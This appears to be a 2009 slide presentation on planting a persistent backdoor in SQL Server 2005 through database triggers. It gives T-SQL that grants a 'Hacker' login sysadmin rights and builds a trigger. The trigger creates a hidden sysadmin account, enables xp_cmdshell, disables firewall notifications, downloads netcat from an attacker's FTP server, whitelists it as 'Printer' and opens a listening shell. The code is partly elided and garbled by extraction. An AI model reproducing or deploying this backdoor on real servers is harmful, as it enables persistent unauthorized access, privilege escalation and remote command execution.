MSSql server 2005 backdoor

1
MSSql server 2005 backdoor

• Duong Ngo
• October 14, 2009

2
POST-EXPLOITATION

• Got access to a MSSQL box? (SQL injection, brute
  force)
• Privileges sa / dbo / normal user
• Got all data
• Now whats next??

3
Backdoors

• Provide easier access to the compromised box in
  the future
• Type of backdoors
• OS backdoors (rootkits),
• Web server backdoor ( PHPshell,
  CGITelnet..)
• So hows about Database Backdoor?? YES!

4
SQL Server 2005 Backdoor

• Well create a backdoor based on SQLServer
  Trigger.
• Whats Trigger?

5
Database Trigger

• Special kind of stored procedure that executes
  automatically when a user attempts the specified
  data-modification statement on the specified
  table (UPDATE, DELETE, INSERT..)
• Trigger gets executed under the security context
  of who caused trigger to fire!

6
EXAMPLE Create trigger

• Context Normal User with Create Trigger
  permission
• CREATE TRIGGER trg_gain_ privilege ON
  tblCustomers FOR INSERT, DELETE,UPDATE
• AS
• EXEC sp_addsrvrolemember _at_loginame 'Hacker',
  _at_rolename N'sysadmin

7
EXAMPLE Trigger got fired

• Context sa (server admin)
• sagt DELETE FROM tblCustomers
• RESULT??
• User Hacker now become sysadmin

8
What can we do with that?

• Privilege escalation normal user -gt higher role
• Database backdoor

9
SQLServer Backdoor features

• - Execute subsequent commands if current user is
  'sa
• - Enable xp_cmdshell
• - Create new login 'backdoor' and add it to
  sysadmin server role.
• - Disable firewall notification mode
• - Add ftp to allowed programs list
• - Get netcat from attacker ftp server
• - Create a directory 'Backdoor_activated' in
  attacker ftp server to let attacker knows
  whenever the backdoor has been started.
• - Open netcat in listen mode attached with sql
  command line client Osql.

10
Our Backdoors Code

• CREATE TRIGGER trg_backdoor ON DATABASE FOR
  DDL_DATABASE_LEVEL_EVENTS
• AS
• BEGIN
• DECLARE _at_cur_user varchar(200)
• CREATE LOGIN backdoor WITH PASSWORD
  'Backdoor123'
• EXEC sys.sp_addsrvrolemember _at_loginame
  N'Backdoor', _at_rolename N'sysadmin'
• --disable firewall notification mode
• Exec master..xp_cmdshell 'netsh firewall set
  notifications disable
• ..

11
Why DL_DATABASE_LEVEL_EVENTS

• Because it consists of all below events
• CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW
  ALTER_VIEW DROP_VIEW
• CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION
  ALTER_FUNCTION DROP_FUNCTION
• CREATE_PROCEDURE ALTER_PROCEDURE DROP_PROCEDURE
  CREATE_TRIGGER ALTER_TRIGGER
• DROP_TRIGGER CREATE_EVENT_NOTIFICATION
  DROP_EVENT_NOTIFICATION
• .
• .

12
Our Backdoors Code (cont)

• -- save ftp commands to an external file
• SET _at_cmd 'echo GET ' _at_fileget ' gtgt '
  _at_cmdfile
• ..
• -- execute ftp with commands loaded from the
  file we created
• SET _at_cmd 'ftp -s' _at_cmdfile
• EXEC master..xp_cmdshell _at_cmd, NO_OUTPUT
• -- After get netcat, add netcat to firewalls
  allowedprogram list
• SET _at_cmd 'netsh firewall add allowedprogram
  program' _at_localdir '\' _at_fileget '
  namePrinter modeENABLE scopeALL profileALL'

13
Thank You for listening!!